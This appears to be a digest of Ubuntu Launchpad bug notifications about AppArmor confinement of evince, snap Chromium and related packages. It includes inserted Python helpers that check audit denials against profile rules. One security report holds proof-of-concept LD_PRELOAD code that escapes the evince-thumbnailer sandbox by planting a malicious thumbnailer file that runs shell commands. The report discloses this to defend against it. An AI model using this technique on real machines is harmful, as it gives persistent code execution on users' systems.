  Unknown
[Desktop-packages] [Bug 1798996] Re: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied
What is the output of:

$ snap version

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu.
https://bugs.launchpad.net/bugs/1798996

Title:
  cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied

Status in gnome-system-monitor package in Ubuntu:
  Incomplete

Bug description:
  $ gnome-system-monitor
  cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied

  And it does not start at all.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1798996/+subscriptions
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Bug watch added: Debian Bug tracker #911161
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=911161

** Also affects: evince (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=911161
   Importance: Unknown
       Status: Unknown

https://bugs.launchpad.net/bugs/1798091

Title:
  thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu:
  Fix Committed
Status in evince package in Debian:
  Unknown

Bug description:
  While trying to create thumbnails in a directory from within nautilus, I got:

  [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
  [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: evince 3.30.1-1
  ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7
  Uname: Linux 4.18.0-8-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Oct 16 14:59:00 2018
  InstallationDate: Installed on 2014-06-19 (1580 days ago)
  InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=de_DE.UTF-8
   SHELL=/bin/bash
  SourcePackage: evince
  UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago)
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Changed in: evince (Ubuntu)
       Status: In Progress => Fix Committed
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Sorry, I said "at the end of the thumbnailer profile". I mean to say:

Ralf, you can workaround this by adjusting /etc/apparmor.d/local/usr.bin.evince to have this:

  owner /tmp/{,.}gnome_desktop_thumbnail.* w,

then running:

  sudo apparmor_parser -r /etc/apparmor.d/usr.bin.evince
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Ralf, you can workaround this by adjusting /etc/apparmor.d/local/usr.bin.evince to have this at the end of the evince-thumbnailer profile:

  owner /tmp/{,.}gnome_desktop_thumbnail.* w,

then running:

  sudo apparmor_parser -r /etc/apparmor.d/usr.bin.evince
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
It looks like the path changed. We have a rule for this already:

  owner /tmp/.gnome_desktop_thumbnail.* w,

I'll adjust.

** Changed in: evince (Ubuntu)
       Status: New => In Progress

** Changed in: evince (Ubuntu)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)
[Desktop-packages] [Bug 1795536] Re: Cannot open new window
This is fixed in https://launchpad.net/ubuntu/+source/evince/3.30.0-3ubuntu1

** Changed in: evince (Ubuntu)
       Status: New => Fix Released

https://bugs.launchpad.net/bugs/1795536

Title:
  Cannot open new window

Status in evince package in Ubuntu:
  Fix Released

Bug description:
  If I launch evince and then try to open a new window by using the menu in evince nothing happens. Also the new window entry is missing in the right click menu of the launcher.

  When I try to open a new window from the Evince menu the following appears in the system log:

  [ 3432.193280] audit: type=1400 audit(1537816996.565:31): apparmor="DENIED" operation="exec" profile="/usr/bin/evince" name="/usr/lib/x86_64-linux-gnu/glib-2.0/gio-launch-desktop" pid=11689 comm="evince" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0

  PD: I'm running debian testing, I've reported the issue here https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=909531 but no ack so far. I noticed that the apparmor profile comes from ubuntu so I thought this might be a better place to report.
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
I referenced the wrong bug in the evince upload so it didn't auto-close, but 3.30.0-3ubuntu1 should address this.

** Changed in: evince (Ubuntu Cosmic)
       Status: Fix Committed => Fix Released

** Changed in: evince (Ubuntu Trusty)
       Status: Triaged => In Progress

** Changed in: evince (Ubuntu Xenial)
       Status: Triaged => In Progress

** Changed in: evince (Ubuntu Bionic)
       Status: Triaged => In Progress

https://bugs.launchpad.net/bugs/1788929

Title:
  Debian/Ubuntu AppArmor policy gaps in evince

Status in AppArmor:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released
Status in evince package in Ubuntu:
  Fix Released
Status in apparmor source package in Trusty:
  Fix Committed
Status in evince source package in Trusty:
  In Progress
Status in apparmor source package in Xenial:
  Fix Committed
Status in evince source package in Xenial:
  In Progress
Status in apparmor source package in Bionic:
  Fix Committed
Status in evince source package in Bionic:
  In Progress
Status in apparmor source package in Cosmic:
  Fix Released
Status in evince source package in Cosmic:
  Fix Released
[Desktop-packages] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy for evince is useless
** Changed in: evince (Ubuntu Cosmic)
       Status: Triaged => Fix Committed

** Summary changed:

- Debian/Ubuntu AppArmor policy for evince is useless
+ Debian/Ubuntu AppArmor policy gaps in evince

** Information type changed from Private Security to Public Security

https://bugs.launchpad.net/bugs/1788929

Title:
  Debian/Ubuntu AppArmor policy gaps in evince

Status in AppArmor:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Committed
Status in evince package in Ubuntu:
  Fix Committed
Status in apparmor source package in Trusty:
  Fix Committed
Status in evince source package in Trusty:
  Triaged
Status in apparmor source package in Xenial:
  Fix Committed
Status in evince source package in Xenial:
  Triaged
Status in apparmor source package in Bionic:
  Fix Committed
Status in evince source package in Bionic:
  Triaged
Status in apparmor source package in Cosmic:
  Fix Committed
Status in evince source package in Cosmic:
  Fix Committed

Bug description:
  [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...]

  Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation:

  https://twitter.com/alex_murray/status/1032780425834446849
  https://twitter.com/alex_murray/status/1032796879640190976

  This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted:

  /usr/bin/evince-thumbnailer {
    [...]
    # Lenient, but remember we still have abstractions/private-files-strict in
    # effect).
    @{HOME}/ r,
    owner @{HOME}/** rw,
    owner /media/** rw,
  }

  As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc:

  [...]
  # don't allow reading/updating of run control files
  deny @{HOME}/.*rc mrk,
  audit deny @{HOME}/.*rc wl,
  # bash
  deny @{HOME}/.bash* mrk,
  audit deny @{HOME}/.bash* wl,
  deny @{HOME}/.inputrc mrk,
  audit deny @{HOME}/.inputrc wl,
  [...]

  Verification:

  user@ubuntu-18-04-vm:~$ cat preload2.c
  #define _GNU_SOURCE
  #include <stdio.h>   /* printf, perror */
  #include <stdlib.h>  /* exit */
  #include <fcntl.h>   /* open, O_WRONLY */
  #include <errno.h>   /* program_invocation_name (glibc, needs _GNU_SOURCE) */

  /* Runs before main() once the library is LD_PRELOADed into the process,
   * i.e. already inside the evince-thumbnailer confinement. */
  __attribute__((constructor)) static void entry(void) {
    printf("constructor running from %s\n", program_invocation_name);
    int fd = open("/home/user/.bashrc", O_WRONLY);
    if (fd != -1) {
      printf("success\n");
    } else {
      perror("open .bashrc");
    }
    exit(0);
  }
  user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC
  user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
  constructor running from evince-thumbnailer
  open .bashrc: Permission denied
  user@ubuntu-18-04-vm:~$ dmesg|tail -n1
  [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000

  But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus.

  To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer:

  user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/
  ls: cannot access '.local/share/thumbnailers/': No such file or directory
  user@ubuntu-18-04-vm:~$ cat preload3.c
  #define _GNU_SOURCE
  #include <stdio.h>      /* printf, fopen, fputs */
  #include <errno.h>      /* errno, EEXIST, program_invocation_name */
  #include <err.h>        /* err */
  #include <sys/stat.h>   /* mkdir */
  #include <sys/types.h>

  /* Same trick: the constructor drops a per-user thumbnailer definition,
   * which the home-directory rules above permit. */
  __attribute__((constructor)) static void entry(void) {
    printf("constructor running from %s\n", program_invocation_name);
    if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST)
      err(1, "mkdir");
    FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w");
    if (!f)
      err(1, "create");
    fputs("[Thumbnailer Entry]\n", f);
    fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat [...]
  }

  As a
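Both evince threads above reduce to the same two questions a practitioner wants answered before reloading a profile: does a file rule's glob actually cover the path an audit line reports, and does a deny rule take that access away again? The following is an added example written for this digest; it is not code from either bug report, nor from the evince or AppArmor projects. It parses an apparmor="DENIED" audit line, turns an AppArmor path glob into a regex, and evaluates a rule list with AppArmor's deny-wins semantics and owner matching. The audit line and the rules are copied from the two reports. The HOME value (/home/user, taken from the reporter's log paths), the literal rule for the denied /tmp path, the simplification that create/delete/append are covered by 'w', and the restriction to the glob features those rules use are all my own assumptions.

```python
import re

_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key="value" / key=value
_GRANTED_BY = {"c": "w", "d": "w", "a": "w"}  # assumption: 'w' covers create/delete/append

def parse_denial(line):
    """Fields of an apparmor="DENIED" audit line (None for any other line)."""
    fields = {m.group(1): m.group(3) if m.group(2) is None else m.group(2)
              for m in _FIELD_RE.finditer(line)}
    if fields.get("apparmor") != "DENIED":
        return None
    return {"profile": fields.get("profile"), "name": fields.get("name"),
            "mask": fields.get("denied_mask") or fields.get("requested_mask", ""),
            "fsuid": int(fields.get("fsuid", 0)), "ouid": int(fields.get("ouid", 0))}

def glob_to_regex(pattern, variables=None):
    """AppArmor path glob -> anchored regex. Handles '**' (anything), '*' and
    '?' (no '/'), '{a,b}' alternation, '[...]' classes and @{VAR} tunables."""
    for name, value in (variables or {}).items():
        pattern = pattern.replace("@{%s}" % name, value)
    out, i, depth = [], 0, 0
    while i < len(pattern):
        ch = pattern[i]
        if pattern.startswith("**", i):
            out.append(".*")
            i += 1                      # second '*' consumed by the final i += 1
        elif ch == "*":
            out.append("[^/]*")
        elif ch == "?":
            out.append("[^/]")
        elif ch == "{":
            out.append("(?:")
            depth += 1
        elif ch == "}" and depth:
            out.append(")")
            depth -= 1
        elif ch == "," and depth:
            out.append("|")
        elif ch == "[":
            j = pattern.index("]", i)   # character class, copied as-is
            out.append(pattern[i:j + 1])
            i = j
        else:
            out.append(re.escape(ch))
        i += 1
    return re.compile("^" + "".join(out) + "$")

def parse_rule(rule):
    """Split '[audit] [deny] [owner] <path> <perms>,' into its parts."""
    tokens = rule.strip().rstrip(",").split()
    flags = set(tokens[:-2])
    return {"deny": "deny" in flags, "owner": "owner" in flags,
            "path": tokens[-2], "perms": set(tokens[-1])}

def evaluate(policy, path, mask, fsuid=0, ouid=0, variables=None):
    """'deny' if a deny rule covers any needed permission (deny always wins),
    'allow' if allow rules cover all of them, else 'unmatched' (also refused).
    'owner' rules only apply when the process uid equals the file owner."""
    needed = {_GRANTED_BY.get(m, m) for m in mask}
    allowed, denied = set(), set()
    for rule in map(parse_rule, policy):
        if rule["owner"] and fsuid != ouid:
            continue
        if glob_to_regex(rule["path"], variables).match(path):
            (denied if rule["deny"] else allowed).update(rule["perms"] & needed)
    if needed & denied:
        return "deny"
    return "allow" if needed <= allowed else "unmatched"

def check_denial(policy, line, variables=None):
    """Evaluate a candidate policy against the access an audit line reports."""
    d = parse_denial(line)
    return evaluate(policy, d["name"], d["mask"], d["fsuid"], d["ouid"], variables)

# Audit line copied from bug 1798091 above.
THUMBNAILER_DENIAL = ('audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" '
                      'operation="mknod" profile="/usr/bin/evince-thumbnailer" '
                      'name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" '
                      'requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000')
# The workaround rule proposed there, plus (my own candidate, not from the
# thread) a literal rule for exactly the path the log reports.
WORKAROUND_RULE = ["owner /tmp/{,.}gnome_desktop_thumbnail.* w,"]
LITERAL_RULE = ["owner /tmp/gnome-desktop-thumbnailer.png w,"]

# Bug 1788929: home-directory allow rules and the deny list quoted from the
# evince-thumbnailer profile. HOME is assumed from the reporter's log paths.
HOME = {"HOME": "/home/user"}
THUMBNAILER_HOME_RULES = [
    "@{HOME}/ r,", "owner @{HOME}/** rw,", "owner /media/** rw,",
    "deny @{HOME}/.*rc mrk,", "audit deny @{HOME}/.*rc wl,",
    "deny @{HOME}/.bash* mrk,", "audit deny @{HOME}/.bash* wl,",
    "deny @{HOME}/.inputrc mrk,", "audit deny @{HOME}/.inputrc wl,",
]

if __name__ == "__main__":
    evil = "/home/user/.local/share/thumbnailers/evil.thumbnailer"
    print("workaround rule vs logged path:", check_denial(WORKAROUND_RULE, THUMBNAILER_DENIAL))
    print("literal rule vs logged path:", check_denial(LITERAL_RULE, THUMBNAILER_DENIAL))
    print("write evil.thumbnailer:", evaluate(THUMBNAILER_HOME_RULES, evil, "w", 1000, 1000, HOME))
```

Run as a script, it reports that the workaround glob (underscores, no "-er") is "unmatched" against the logged /tmp/gnome-desktop-thumbnailer.png while the literal rule is "allow"; for the bug 1788929 policy it reports "deny" for a write to ~/.bashrc but "allow" for ~/.local/share/thumbnailers/evil.thumbnailer, which is exactly the gap between the deny list and the owner @{HOME}/** rw rule that the report demonstrates. The same glob translation handles the {,snap/core/[0-9]*/} and /run/udev/data/c238:[0-9]* patterns that appear later in this digest.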
[Desktop-packages] [Bug 1742743] Re: [MIR] woff2
Since this has an ACK from both MIR and security, marking Fix Committed.

** Changed in: woff2 (Ubuntu)
       Status: New => Fix Committed

https://bugs.launchpad.net/bugs/1742743

Title:
  [MIR] woff2

Status in webkit2gtk package in Ubuntu:
  Fix Committed
Status in woff2 package in Ubuntu:
  Fix Committed

Bug description:
  Availability
  ============
  Built for all supported architectures. In sync with Debian.

  Rationale
  =========
  woff2 is a library maintained by Google to convert fonts from TTF to the woff2 format and decompress from woff2 to TTF. The WOFF 2.0 format uses the Brotli compression algorithm to compress fonts suitable for use in CSS @font-face rules. WOFF 2.0 is a W3C Candidate Recommendation. See the brotli MIR at LP: #1737053.

  brotli and woff2 are libraries that are technically already in main because they are bundled in Firefox and webkit2gtk. The next major stable release of webkit2gtk, 2.20, will be released in March. It drops those 2 bundled libraries. I think our options are basically
  1) Bundle those libraries anyway, or
  2) Approve this MIR, or
  3) Drop support for the WOFF2 format in webkit2gtk

  Security
  ========
  I assume we want a security review here.
  https://security-tracker.debian.org/tracker/source-package/woff2
  https://launchpad.net/ubuntu/+source/woff2/+cve

  Quality assurance
  =================
  - Ubuntu Desktop Bugs is subscribed.
  - No test suite
  - No autopkgtests
  https://bugs.launchpad.net/ubuntu/+source/woff2
  https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=woff2
  https://github.com/google/woff2/issues

  Dependencies
  ============
  Only universe binary dependency is brotli (LP: #1737053)

  Standards compliance
  ====================
  4.1.2, debhelper compat 10, dh7 simple rules

  Maintenance
  ===========
  Actively maintained: https://github.com/google/woff2
  Maintained by the Debian Fonts Team in Debian. It's a small team so it may need co-maintenance help from the Ubuntu Desktop team.

  Other Info
  ==========
  woff2 was only packaged in Debian and Ubuntu very recently.

  webkit2gtk is managed similarly to Firefox and Chromium. So far, new releases are pushed to Ubuntu 16.04 LTS and newer as security updates, but the Ubuntu Security Team does not guarantee security support for webkit2gtk. We are going to need to backport brotli and woff2 into main as security updates for 16.04 LTS and 17.10.

  Packaging is at https://salsa.debian.org/fonts-team/woff2/tree/debian/unstable/debian
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
I went through this the other day with a personal profile. We probably can do something along the lines of:

  /{,snap/core/[0-9]*/}usr/bin/snap mrCx -> snap_browser,

  profile snap_browser {
    #include

    /etc/passwd r,
    /etc/group r,
    /etc/nsswitch.conf r,
    /dev/tty rw,

    # noisy
    deny network inet stream,
    deny network inet6 stream,
    deny owner /run/user/[0-9]*/gdm/Xauthority r, # not needed on Ubuntu

    /{,snap/core/[0-9]*/}usr/bin/snap mrix, # re-exec
    /etc/fstab r,
    @{PROC}/sys/net/core/somaxconn r,
    @{PROC}/sys/kernel/seccomp/actions_avail r,
    owner @{PROC}/@{pid}/mountinfo r,
    owner @{HOME}/.snap/auth.json r, # if exists, required
    /run/snapd.socket rw,
    /snap/core/[0-9]*/usr/lib/snapd/info r,
    /snap/core/[0-9]*/usr/lib/snapd/snapd r,
    /var/lib/snapd/system-key r,
    /{,snap/core/*/}usr/lib/snapd/snap-confine Pix,
    /sys/kernel/security/apparmor/features/ r,

    # allow launching official browser snaps. This could be abstracted into an
    # #include or tunable
    /snap/chromium/*/meta/snap.yaml r,
    /snap/firefox/*/meta/snap.yaml r,
    # ...
  }

https://bugs.launchpad.net/bugs/1794064

Title:
  Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in evince package in Ubuntu:
  New

Bug description:
  This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap).

  This is not a recent regression, it's not working on bionic either.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: evince 3.30.0-2
  ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5
  Uname: Linux 4.18.0-7-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.10-0ubuntu11
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Sep 24 12:28:06 2018
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2016-07-02 (813 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  SourcePackage: evince
  UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago)
  modified.conffile..etc.apparmor.d.abstractions.evince: [modified]
  mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158
[Desktop-packages] [Bug 1738164] Re: [snap] U2F doesn't work with yubikey
The actual rules would be:

  # for U2F yubikey
  /run/udev/data/c238:[0-9]* r,
  /run/udev/data/c239:[0-9]* r,
  /run/udev/data/c240:[0-9]* r,

but using the redundant rules from the previous comment is fine too.

https://bugs.launchpad.net/bugs/1738164

Title:
  [snap] U2F doesn't work with yubikey

Status in chromium-browser package in Ubuntu:
  Confirmed

Bug description:
  (initially reported by Daniel at https://forum.snapcraft.io/t/call-for-testing-chromium-62-0-3202-62/2569/50)

  « U2F (Universal 2nd Factor) isn't working when signing into my gmail account trying to use my yubikey. This is a USB device which IIRC chromium needs bidirectional communication with. »

  This requires investigation, but the yubikey I have is too old and doesn't support U2F.
[Desktop-packages] [Bug 1738164] Re: [snap] U2F doesn't work with yubikey
We can add this to browser-support:

  # for U2F yubikey
  /run/udev/data/c238:[0-9]* r,
  /run/udev/data/c239:[0-9]* r,
  /run/udev/data/c240:[0-9]* r,
  /run/udev/data/c240:[0-9]* r,
  /run/udev/data/c240:[0-9]* r,

Can someone experiencing this issue adjust
/var/lib/snapd/apparmor/profiles/snap.chromium.chromium to have the
above, and then run:

  sudo apparmor_parser -r /var/lib/snapd/apparmor/profiles/snap.chromium.chromium

and report back if the issue is resolved? If not, please paste any other
apparmor denials.

-- 
https://bugs.launchpad.net/bugs/1738164

Title:
  [snap] U2F doesn't work with yubikey

Status in chromium-browser package in Ubuntu:
  Confirmed
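The rules discussed in the two comments above can be derived mechanically from the kernel's AppArmor audit lines, and a profile can be checked for coverage before it is reloaded with apparmor_parser. The Python below is an added example written for this page; it is not code from the bug thread, from snapd or from Chromium. The audit lines and the profile fragment are constructed samples, and the glob-to-regex translation is an assumption that handles only the constructs these rules use.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample audit lines (not copied from the bug report), in the
# shape a denied open() of a udev database entry takes in dmesg/kern.log.
SAMPLE_DENIALS = """\
audit: type=1400 audit(1513000000.001:101): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/c238:5" pid=1234 comm="chromium-browse" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1513000000.002:102): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/c239:0" pid=1234 comm="chromium-browse" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1513000000.003:103): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/c240:3" pid=1234 comm="chromium-browse" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1513000000.004:104): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/c240:7" pid=1234 comm="chromium-browse" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1513000000.005:105): apparmor="ALLOWED" operation="open" profile="snap.chromium.chromium" name="/run/udev/data/c240:7" pid=1234 comm="chromium-browse" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1513000000.006:106): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/etc/fstab" pid=1234 comm="chromium-browse" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
"""

# Constructed profile fragment (not the real snap.chromium.chromium profile).
SAMPLE_PROFILE = """\
/dev/bus/usb/[0-9][0-9][0-9]/[0-9][0-9][0-9] rw,
# for U2F yubikey
/run/udev/data/c238:[0-9]* r,
/run/udev/data/c239:[0-9]* r,
/run/udev/data/c240:[0-9]* r,
"""

AUDIT_RE = re.compile(
    r'apparmor="(?P<action>[A-Z]+)".*?profile="(?P<profile>[^"]+)"'
    r'.*?name="(?P<name>[^"]+)".*?denied_mask="(?P<mask>[^"]+)"'
)
UDEV_CHAR_RE = re.compile(r"^/run/udev/data/c(?P<major>\d+):(?P<minor>\d+)$")
RULE_RE = re.compile(r"^\s*(?P<path>/\S+)\s+(?P<mask>[a-z]+),\s*$")


def parse_denials(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Keep only apparmor="DENIED" events; ALLOWED (complain-mode) lines are skipped."""
    found = []
    for line in lines:
        m = AUDIT_RE.search(line)
        if m and m.group("action") == "DENIED":
            found.append({"profile": m.group("profile"), "name": m.group("name"), "mask": m.group("mask")})
    return found


def udev_rules_for(denials: List[Dict[str, str]], profile: str) -> List[str]:
    """One rule per char-device major, using the [0-9]* minor wildcard from the
    comments above. Non-udev denials are deliberately left out: they need a
    human decision, not an automatic allow."""
    rules = set()
    for d in denials:
        m = UDEV_CHAR_RE.match(d["name"])
        if d["profile"] == profile and m:
            rules.add(f"/run/udev/data/c{m.group('major')}:[0-9]* {d['mask']},")
    return sorted(rules)


def glob_to_regex(pattern: str) -> "re.Pattern[str]":
    """Minimal AppArmor path glob translation (assumption: only the constructs
    used here): '**' may cross '/', '*' may not, '?' is one non-'/' char and
    [...] classes pass through unchanged."""
    out, i = "", 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            out += ".*"
            i += 2
            continue
        c = pattern[i]
        if c == "*":
            out += "[^/]*"
        elif c == "?":
            out += "[^/]"
        elif c == "[":
            j = pattern.index("]", i)
            out += pattern[i:j + 1]
            i = j
        else:
            out += re.escape(c)
        i += 1
    return re.compile("^" + out + "$")


def profile_covers(profile_text: str, path: str, mask: str = "r") -> bool:
    """True if some rule in the profile text grants every permission in `mask` on `path`."""
    for line in profile_text.splitlines():
        m = RULE_RE.match(line)
        if m and set(mask) <= set(m.group("mask")) and glob_to_regex(m.group("path")).match(path):
            return True
    return False


def missing_rules(profile_text: str, denials: List[Dict[str, str]], profile: str) -> List[str]:
    """Rules still needed for the udev denials the profile does not already cover."""
    uncovered = [d for d in denials if not profile_covers(profile_text, d["name"], d["mask"])]
    return udev_rules_for(uncovered, profile)


if __name__ == "__main__":
    denials = parse_denials(SAMPLE_DENIALS.splitlines())
    print("rules needed with an empty profile:")
    print("\n".join(missing_rules("", denials, "snap.chromium.chromium")))
    print("rules needed with the sample profile:",
          missing_rules(SAMPLE_PROFILE, denials, "snap.chromium.chromium") or "none")
```

Running it against real data means feeding `parse_denials` the output of `journalctl -k` or `dmesg` and `profile_covers` the profile file named in the comment above; the /etc/fstab denial in the sample is there to show that only udev device entries are turned into rules automatically.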
[Desktop-packages] [Bug 1709164] Re: [MIR] bubblewrap
** Changed in: bubblewrap (Ubuntu)
     Assignee: Seth Arnold (seth-arnold) => Alex Murray (alexmurray)

-- 
https://bugs.launchpad.net/bugs/1709164

Title:
  [MIR] bubblewrap

Status in bubblewrap package in Ubuntu:
  Triaged

Bug description:
  Availability
  ============
  Built for all supported architectures. In sync with Debian.

  Rationale
  =========
  The gnome-desktop3 library 3.25.90+ requires bubblewrap. bubblewrap is
  most commonly used as part of Flatpak's security isolation feature.
  Here it's being used to sandbox the thumbnailers. See
  https://git.gnome.org/browse/gnome-desktop/log (changes from 3.25.4 to
  3.25.90)

  The bubblewrap feature was disabled in Ubuntu 17.10's gnome-desktop3
  package because this MIR was not processed.

  Security
  ========
  No known open security vulnerabilities in any Ubuntu releases.
  https://security-tracker.debian.org/tracker/source-package/bubblewrap

  I helped prepare a security update (LP: #1657357) (CVE-2017-5226) for
  bubblewrap/flatpak several months ago.

  Security-sensitive package.

  Quality assurance
  =================
  Bug subscriber: should be Ubuntu Desktop Bugs
  https://bugs.launchpad.net/ubuntu/+source/bubblewrap
  https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=bubblewrap
  https://github.com/projectatomic/bubblewrap/issues

  dh_auto_test runs the build tests but they appear to be set as SKIP
  upstream. (See comment #4)

  Multiple autopkgtests passing on all Ubuntu architectures. Because the
  tests require machine isolation, the autopkgtests don't run on Debian's
  infrastructure currently.

  Dependencies
  ============
  check-mir reports all other binary dependencies are in main

  Standards compliance
  ====================
  4.0.0

  Maintenance
  ===========
  - Actively developed upstream https://github.com/projectatomic/bubblewrap
  - Maintained in Debian by the pkg-utopia team but more specifically, it
    is maintained by Simon McVittie (smcv) who also maintains Flatpak and
    ostree in Debian and Ubuntu.

  short dh7 style rules, dh compat 10

  Background information
  ======================
  William Hua (attente) had been working last year on a snapcraft plugin
  that used bubblewrap. So maybe more stuff will use bubblewrap in the
  future.
[Desktop-packages] [Bug 1709164] Re: [MIR] bubblewrap
FYI, while this is currently assigned to Seth, I do want to note that
bubblewrap is setuid so it is going to require extra scrutiny
(incidentally this was not called out in this bug's description).
Regardless of the outcome of the bubblewrap review, the sandboxing
feature is highly desirable so we'll be sure to outline a path forward so
these thumbnailers can run in a restricted environment.

-- 
https://bugs.launchpad.net/bugs/1709164

Title:
  [MIR] bubblewrap

Status in bubblewrap package in Ubuntu:
  Triaged
[Desktop-packages] [Bug 1709164] Re: [MIR] bubblewrap
I'm coming up to speed on this issue now and have discussed this with
